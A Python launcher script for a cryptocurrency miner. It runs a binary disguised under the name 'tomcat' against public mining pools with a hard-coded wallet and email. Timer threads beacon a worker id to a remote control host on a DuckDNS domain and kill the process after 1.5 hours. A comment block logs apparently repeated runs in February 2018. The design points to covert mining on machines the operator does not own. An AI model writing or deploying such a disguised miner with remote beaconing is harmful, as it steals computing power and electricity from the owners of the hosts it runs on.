import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:11:03.516625
#2018-02-17 15:59:01.239138
#2018-02-17 17:46:05.288811
#2018-02-17 19:35:08.119513
#2018-02-17 21:25:06.416008
#2018-02-17 23:09:06.093895
#2018-02-18 00:56:04.352701
#2018-02-18 02:44:05.468848
#2018-02-18 04:33:04.966911
#2018-02-18 06:24:07.389591
#2018-02-18 08:13:02.036128
#2018-02-18 10:01:01.582625
#2018-02-18 11:47:03.562127
#2018-02-18 13:32:05.685590
#2018-02-18 15:21:07.388631
#2018-02-18 17:10:06.400465
#2018-02-18 18:58:06.701036
#2018-02-18 20:45:07.363582
#2018-02-18 22:32:01.457356
#2018-02-19 00:20:05.594719
#2018-02-19 02:06:05.517008
#2018-02-19 03:53:06.209961
#2018-02-19 05:39:05.095215
#2018-02-19 07:26:05.736664
#2018-02-19 09:16:04.521815
#2018-02-19 11:05:08.397468
#2018-02-19 12:52:05.545489
#2018-02-19 14:40:07.559491
#2018-02-19 16:27:03.985098
#2018-02-19 18:14:05.711361
#2018-02-19 20:01:01.804339
#2018-02-19 21:51:08.049921
#2018-02-19 23:37:06.312774
#2018-02-20 01:24:03.973063
#2018-02-20 03:14:06.805213
#2018-02-20 05:02:04.623470
#2018-02-20 06:45:03.816103
#2018-02-20 08:31:05.946421
#2018-02-20 10:15:07.974167
#2018-02-20 11:59:07.945591
#2018-02-20 13:47:06.127700
#2018-02-20 15:26:09.341541
#2018-02-20 17:12:02.205206
#2018-02-20 19:03:07.184776
#2018-02-20 20:51:06.992010
#2018-02-20 22:35:08.976667
#2018-02-21 00:16:01.505240
#2018-02-21 02:01:06.812861
#2018-02-21 03:49:06.831473
#2018-02-21 05:32:04.214076
#2018-02-21 07:21:05.219757
#2018-02-21 09:06:04.488118
#2018-02-21 10:55:09.430881
#2018-02-21 12:41:07.701207
#2018-02-21 14:29:05.791977
#2018-02-21 16:16:01.734618
#2018-02-21 18:07:07.486944
#2018-02-21 19:55:08.738255
#2018-02-21 21:41:07.678421
#2018-02-21 23:28:07.926681
#2018-02-22 01:17:04.755910
#2018-02-22 03:08:05.120247
#2018-02-22 04:52:06.369057
#2018-02-22 06:38:04.336394
#2018-02-22 08:26:06.565374
#2018-02-22 10:13:04.448553
#2018-02-22 11:58:01.324770
#2018-02-22 13:43:07.369059
#2018-02-22 15:31:05.581023
#2018-02-22 17:17:07.118217
#2018-02-22 19:04:07.151867
#2018-02-22 20:56:01.465772
#2018-02-22 22:43:07.964143
#2018-02-23 00:31:04.144911
#2018-02-23 02:18:05.958811
#2018-02-23 04:07:04.040577
#2018-02-23 05:54:02.145212
#2018-02-23 07:44:04.099520
#2018-02-23 09:53:03.963034
#2018-02-23 11:57:06.782337
#2018-02-23 13:47:10.976901
#2018-02-23 15:36:08.141740
#2018-02-23 17:24:01.462474
#2018-02-23 19:09:01.923264
#2018-02-23 20:53:07.243160
#2018-02-23 22:42:06.542410
#2018-02-24 00:29:02.216551
#2018-02-24 02:19:07.724778
#2018-02-24 04:10:06.576195
#2018-02-24 05:58:01.508611
#2018-02-24 07:45:04.215720
#2018-02-24 09:33:01.469069
#2018-02-24 11:26:04.175372
#2018-02-24 13:15:04.309332
#2018-02-24 15:06:03.796506
#2018-02-24 16:54:06.941909
#2018-02-24 18:42:07.545790
#2018-02-24 20:34:01.290590
#2018-02-25 01:12:07.730735
#2018-02-25 05:00:08.814705
#2018-02-25 09:44:01.781800